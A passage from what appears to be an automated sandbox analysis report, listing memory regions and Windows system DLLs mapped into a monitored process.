entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 3363 start_va = 0x1640000 end_va = 0x16bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001640000" filename = "" Region: id = 3364 start_va = 0x7fefb0e0000 end_va = 0x7fefb13dfff monitored = 0 entry_point = 0x7fefb0e9024 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 3365 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 3373 start_va = 0x920000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 3376 start_va = 0x7fefda40000 end_va = 0x7fefda75fff monitored = 0 entry_point = 0x7fefda41474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3377 start_va = 0x7fefdd60000 end_va = 0x7fefdf36fff monitored = 0 entry_point = 0x7fefdd61010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 3378 start_va = 0x7fefd970000 end_va = 0x7fefd989fff monitored = 0 entry_point = 0x7fefd971558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3379 start_va = 0x120000 end_va = 0x12cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 3380 start_va = 0x7fefd990000 end_va = 0x7fefd9cafff monitored = 0 entry_point = 0x7fefd991324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 3381 start_va = 0x7fefdb20000 end_va = 0x7fefdc8cfff monitored = 0 entry_point = 0x7fefdb210b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3382 start_va = 0x7fefd960000 end_va = 0x7fefd96efff monitored = 0 entry_point = 0x7fefd961020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3385 start_va = 0x1310000 end_va = 0x138ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 3386 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 3387 start_va = 0x7fefaf90000 end_va = 0x7fefaf99fff monitored = 0 entry_point = 0x7fefaf9260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 3388 start_va = 0x7fefafa0000 end_va = 0x7fefb0b1fff monitored = 0 entry_point = 0x7fefafbf354 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 3389 start_va = 0x7fefb9a0000 end_va = 0x7fefb9b4fff monitored = 0 entry_point = 0x7fefb9a1050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3390 start_va = 0x7fefb9c0000 end_va = 0x7fefb9cbfff monitored = 0 entry_point = 0x7fefb9c18a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3391 start_va = 0x7fefb9d0000 end_va = 0x7fefb9e5fff monitored = 0 entry_point = 0x7fefb9d11a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3392 start_va = 0x7fefbc60000 end_va = 0x7fefbc94fff monitored = 0 entry_point = 0x7fefbc61064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 3393 start_va = 0x7fefcc10000 end_va = 0x7fefcc1cfff monitored = 0 entry_point = 0x7fefcc11348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 3394 start_va = 0x7fefcd40000 end_va = 0x7fefcd78fff monitored = 0 entry_point = 0x7fefcd4c0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 3395 start_va = 0x7fefd290000 end_va = 0x7fefd2b2fff monitored = 0 entry_point = 0x7fefd291198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3396 start_va = 0x7fefd420000 end_va = 0x7fefd44efff monitored = 0 entry_point = 0x7fefd421064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 3397 start_va = 0x7fefd4a0000 end_va = 0x7fefd50cfff monitored = 0 entry_point = 0x7fefd4a1010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 3398 start_va = 0x7fefe280000 end_va = 0x7feff007fff monitored = 0 entry_point = 0x7fefe2fcebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3400 start_va = 0x1020000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3403 start_va = 0x7fefaf30000 end_va = 0x7fefaf85fff monitored = 0 entry_point = 0x7fefaf31040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 3404 start_va = 0x7fefaf20000 end_va = 0x7fefaf28fff monitored = 0 entry_point = 0x7fefaf21020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 3406 start_va = 0x7fefaef0000 end_va = 0x7fefaef8fff monitored = 0 entry_point = 0x7fefaef3668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 3407 start_va = 0x7fefcfa0000 end_va = 0x7fefcfcffff monitored = 0 entry_point = 0x7fefcfa194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 3408 start_va = 0x1830000 end_va = 0x18affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001830000" filename = "" Region: id = 3409 start_va = 0x7fefcd80000 end_va = 0x7fefcd89fff monitored = 0 entry_point = 0x7fefcd83cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 3410 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 3411 start_va = 0x1940000 end_va = 0x19bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 3412 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 3422 start_va = 0x1890000 end_va = 0x190ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001890000" filename = "" Region: id = 3423 start_va = 0x1a50000 end_va = 0x1acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a50000" filename = "" Region: id = 3424 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 3425 start_va = 0x7fefaee0000 end_va = 0x7fefaeeefff monitored = 0 entry_point = 0x7fefaee7e80 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 3426 start_va = 0x7fefae60000 end_va = 0x7fefaed6fff monitored = 0 entry_point = 0x7fefae6afd0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 3427 start_va = 0x7fefbb00000 end_va = 0x7fefbb10fff monitored = 0 entry_point = 0x7fefbb01070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3430 start_va = 0x7fefb3f0000 end_va = 0x7fefb456fff monitored = 0 entry_point = 0x7fefb406060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3431 start_va = 0x1b0000 end_va = 0x1b3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 3432 start_va = 0x7fefca80000 end_va = 0x7fefca8bfff monitored = 0 entry_point = 0x7fefca81064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3433 start_va = 0x1c0000 end_va = 0x1c9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 3434 start_va = 0x7fefd7c0000 end_va = 0x7fefd850fff monitored = 0 entry_point = 0x7fefd7c1440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 3435 start_va = 0x16c0000 end_va = 0x17bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 3436 start_va = 0x1d0000 end_va = 0x1dffff monitored = 0 entry_point = 0x1d3e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 3437 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 3440 start_va = 0x19d0000 end_va = 0x1a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019d0000" filename = "" Region: id = 3441 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 3442 start_va = 0x7fefd150000 end_va = 0x7fefd1a4fff monitored = 0 entry_point = 0x7fefd151054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3443 start_va = 0x7fefcb50000 end_va = 0x7fefcb56fff monitored = 0 entry_point = 0x7fefcb514b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 3444 start_va = 0x7fefd140000 end_va = 0x7fefd146fff monitored = 0 entry_point = 0x7fefd14142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 3445 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3446 start_va = 0x7fefd2f0000 end_va = 0x7fefd321fff monitored = 0 entry_point = 0x7fefd2f144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 3517 start_va = 0x1b00000 end_va = 0x1b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 3518 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 3668 start_va = 0x1c90000 end_va = 0x1d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 3669 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 3687 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 3688 start_va = 0x7fefc3f0000 end_va = 0x7fefc5e3fff monitored = 0 entry_point = 0x7fefc57c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 3689 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 3690 start_va = 0x870000 end_va = 0x871fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 3713 start_va = 0x7fefc110000 end_va = 0x7fefc23bfff monitored = 0 entry_point = 0x7fefc1194bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3715 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 3716 start_va = 0xac0000 end_va = 0xaeffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 3729 start_va = 0x880000 end_va = 0x883fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 3737 start_va = 0x1160000 end_va = 0x11c5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 3744 start_va = 0x890000 end_va = 0x89dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 4182 start_va = 0x1d40000 end_va = 0x1dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 4183 start_va = 0x7fef8bf0000 end_va = 0x7fef8c29fff monitored = 0 entry_point = 0x7fef8c0d020 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 4184 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 4194 start_va = 0x7fef8ae0000 end_va = 0x7fef8b56fff monitored = 0 entry_point = 0x7fef8b1e7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 4197 start_va = 0x7fefd330000 end_va = 0x7fefd351fff monitored = 0 entry_point = 0x7fefd335d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4207 start_va = 0x1e10000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 4208 start_va = 0x7fef8a00000 end_va = 0x7fef8a3cfff monitored = 0 entry_point = 0x7fef8a01070 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 4209 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 4210 start_va = 0x7fefb3b0000 end_va = 0x7fefb3d6fff monitored = 0 entry_point = 0x7fefb3b98bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4211 start_va = 0x7fefb3a0000 end_va = 0x7fefb3aafff monitored = 0 entry_point = 0x7fefb3a1198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4212 start_va = 0x7fef89d0000 end_va = 0x7fef89f4fff monitored = 0 entry_point = 0x7fef89e8c54 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 4257 start_va = 0x1ea0000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 4258 start_va = 0x74300000 end_va = 0x74301fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 4259 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 4274 start_va = 0x7fef8490000 end_va = 0x7fef8521fff monitored = 0 entry_point = 0x7fef85051ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4283 start_va = 0x7fefca90000 end_va = 0x7fefcb4afff monitored = 0 entry_point = 0x7fefca96de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 4284 start_va = 0x7fefb250000 end_va = 0x7fefb2a2fff monitored = 0 entry_point = 0x7fefb252b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4285 start_va = 0x7fefb830000 end_va = 0x7fefb840fff monitored = 0 entry_point = 0x7fefb8314c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 4290 start_va = 0x7fef8270000 end_va = 0x7fef82b1fff monitored = 0 entry_point = 0x7fef82717e4 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 4300 start_va = 0x7fef81f0000 end_va = 0x7fef8236fff monitored = 0 entry_point = 0x7fef81f1040 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 4309 start_va = 0x1f20000 end_va = 0x206ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 4310 start_va = 0x2070000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 4311 start_va = 0x21b0000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 4312 start_va = 0xed0000 end_va = 0xefffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\System32\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netmsg.dll.mui") Region: id = 4313 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4314 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4315 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4316 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4317 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4318 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4319 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4320 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4321 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4322 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4323 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4324 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4325 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4326 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4327 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4328 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4329 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4330 start_va = 0x7fef81e0000 end_va = 0x7fef81e7fff monitored = 0 entry_point = 0x7fef81e1020 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 4337 start_va = 0x2080000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 4338 start_va = 0x21a0000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 4339 start_va = 0x7fef8190000 end_va = 0x7fef81dffff monitored = 0 entry_point = 0x7fef8191190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 4340 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 4344 start_va = 0x7fefd520000 end_va = 0x7fefd533fff monitored = 0 entry_point = 0x7fefd524160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 4352 start_va = 0x1ec0000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 4353 start_va = 0x7fef8160000 end_va = 0x7fef8178fff monitored = 0 entry_point = 0x7fef8161104 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 4356 start_va = 0x2210000 end_va = 0x228ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 4357 start_va = 0x2340000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 4358 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 4359 start_va = 0x7fef8820000 end_va = 0x7fef89cffff monitored = 0 entry_point = 0x7fef8821010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 4360 start_va = 0x7fef8800000 end_va = 0x7fef8816fff monitored = 0 entry_point = 0x7fef8801060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 4361 start_va = 0x9a0000 end_va = 0x9a7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 4362 start_va = 0x1c10000 end_va = 0x1c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 4363 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 4364 start_va = 0x23c0000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 4365 start_va = 0x23c0000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 4366 start_va = 0x2560000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 4367 start_va = 0x7fef80d0000 end_va = 0x7fef8153fff monitored = 0 entry_point = 0x7fef8121118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 4368 start_va = 0x12a0000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 4369 start_va = 0x23c0000 end_va = 0x24bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 4370 start_va = 0x24c0000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 4371 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025e0000" filename = "" Region: id = 4372 start_va = 0x26e0000 end_va = 0x27dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 4373 start_va = 0x7fefb980000 end_va = 0x7fefb993fff monitored = 0 entry_point = 0x7fefb9816b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4374 start_va = 0x2110000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 4375 start_va = 0x27e0000 end_va = 0x29affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 4376 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 4377 start_va = 0x17f0000 